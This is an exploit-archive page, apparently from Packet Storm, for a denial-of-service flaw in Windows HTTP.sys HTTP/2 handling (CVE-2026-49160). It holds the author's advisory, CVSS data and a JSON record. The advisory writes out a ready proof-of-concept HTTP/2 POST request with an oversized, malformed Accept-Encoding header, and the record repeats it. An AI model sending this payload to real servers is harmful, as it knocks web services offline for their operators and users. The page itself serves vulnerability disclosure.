📄 HTTP.sys HTTP/2 Denial of Service_PACKETSTORM:224227

7.5 / 10

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Description

This advisory provides simple proof of concept details to trigger the HTTP/2 denial of service condition related to malformed Accept-Encoding headers...

Visit Original Source

Basic Information

ID PACKETSTORM:224227

Published Jun 24, 2026 at 00:00

Affected Product

Affected Versions # Titles: CVE-2026-49160 - HTTP.sys HTTP/2 Denial of Service (DoS) Vulnerability
# Author: nu11secur1ty
# Date: 06/24/2026
# Vendor: Microsoft Corporation
# Software: Windows HTTP.sys (HTTP/2 Protocol Stack)
# Reference: https://nvd.nist.gov/vuln/detail/CVE-2026-49160

## Description:

A critical Denial of Service (DoS) vulnerability exists in the Windows
HTTP.sys kernel-mode driver, specifically in its handling of HTTP/2
protocol requests. The vulnerability, tracked as CVE-2026-49160, allows an
unauthenticated remote attacker to cause uncontrolled resource consumption
(CWE-400) by sending a specially crafted HTTP/2 request with an oversized
and malformed Accept-Encoding header. This triggers excessive memory
allocation and CPU utilization within HTTP.sys, effectively crashing the
service and rendering all dependent web services (such as IIS) unavailable.
The attack can be executed within seconds and does not require any form of
authentication or user interaction. All supported versions of Windows
Server (2016, 2019, 2022, 2025) and Windows client OS (10, 11) are affected
prior to the June 2026 security update.

STATUS: MEDIUM - HIGH/ Vulnerability

[+]Payload:
``` POST
POST / HTTP/2
Host: target.com
Accept-Encoding:
AAAAAAAAAAAAAAAAAAAAAAAA,BBBBBBcccACCCACACATTATTATAASDFADFAFSDDAHJSKSKKSKKSKJHHSHHHAY&AU&**SISODDJJDJJDJJJDJJSU**S,RRARRARYYYATTATTTTATTATTATSHHSGGUGFURYTIUHSLKJLKJMNLSJLJLJSLJJLJLKJHJVHGF,TTYCTCTTTCGFDSGAHDTUYGKJHJLKJHGFUTYREYUTIYOUPIOOLPLMKNLIJOPKOLPKOPJLKOP,OOOAOAOOOAOOAOOOAOOOAOOOAOO,****************************stupiD,*,,
```

[+]Demo:
Video Demonstration
[url](https://www.patreon.com/nu11secur1ty/posts/cve-2026-49160-161926764)

Time spent:
00:01:20

{
    "lastseen": "2026-06-24T17:08:27",
    "description": "This advisory provides simple proof of concept details to trigger the HTTP/2 denial of service condition related to malformed Accept-Encoding headers...",
    "published": "2026-06-24T00:00:00",
    "modified": "2026-06-24T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 HTTP.sys HTTP/2 Denial of Service",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:224227",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2026-49160"
    ],
    "sourceData": "# Titles: CVE-2026-49160 - HTTP.sys HTTP/2 Denial of Service (DoS) Vulnerability\n    # Author: nu11secur1ty\n    # Date: 06/24/2026\n    # Vendor: Microsoft Corporation\n    # Software: Windows HTTP.sys (HTTP/2 Protocol Stack)\n    # Reference: https://nvd.nist.gov/vuln/detail/CVE-2026-49160\n    \n    ## Description:\n    \n    A critical Denial of Service (DoS) vulnerability exists in the Windows\n    HTTP.sys kernel-mode driver, specifically in its handling of HTTP/2\n    protocol requests. The vulnerability, tracked as CVE-2026-49160, allows an\n    unauthenticated remote attacker to cause uncontrolled resource consumption\n    (CWE-400) by sending a specially crafted HTTP/2 request with an oversized\n    and malformed Accept-Encoding header. This triggers excessive memory\n    allocation and CPU utilization within HTTP.sys, effectively crashing the\n    service and rendering all dependent web services (such as IIS) unavailable.\n    The attack can be executed within seconds and does not require any form of\n    authentication or user interaction. All supported versions of Windows\n    Server (2016, 2019, 2022, 2025) and Windows client OS (10, 11) are affected\n    prior to the June 2026 security update.\n    \n    STATUS: MEDIUM - HIGH/ Vulnerability\n    \n    [+]Payload:\n    ``` POST\n    POST / HTTP/2\n    Host: target.com\n    Accept-Encoding:\n    AAAAAAAAAAAAAAAAAAAAAAAA,BBBBBBcccACCCACACATTATTATAASDFADFAFSDDAHJSKSKKSKKSKJHHSHHHAY&AU&**SISODDJJDJJDJJJDJJSU**S,RRARRARYYYATTATTTTATTATTATSHHSGGUGFURYTIUHSLKJLKJMNLSJLJLJSLJJLJLKJHJVHGF,TTYCTCTTTCGFDSGAHDTUYGKJHJLKJHGFUTYREYUTIYOUPIOOLPLMKNLIJOPKOLPKOPJLKOP,OOOAOAOOOAOOAOOOAOOOAOOOAOO,****************************stupiD,*,,\n    ```\n    \n    [+]Demo:\n    Video Demonstration\n    [url](https://www.patreon.com/nu11secur1ty/posts/cve-2026-49160-161926764)\n    \n    Time spent:\n    00:01:20",
    "sourceHref": "https://packetstorm.news/download/224227",
    "cvss": {
        "score": 7.5,
        "severity": "HIGH",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/224227/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply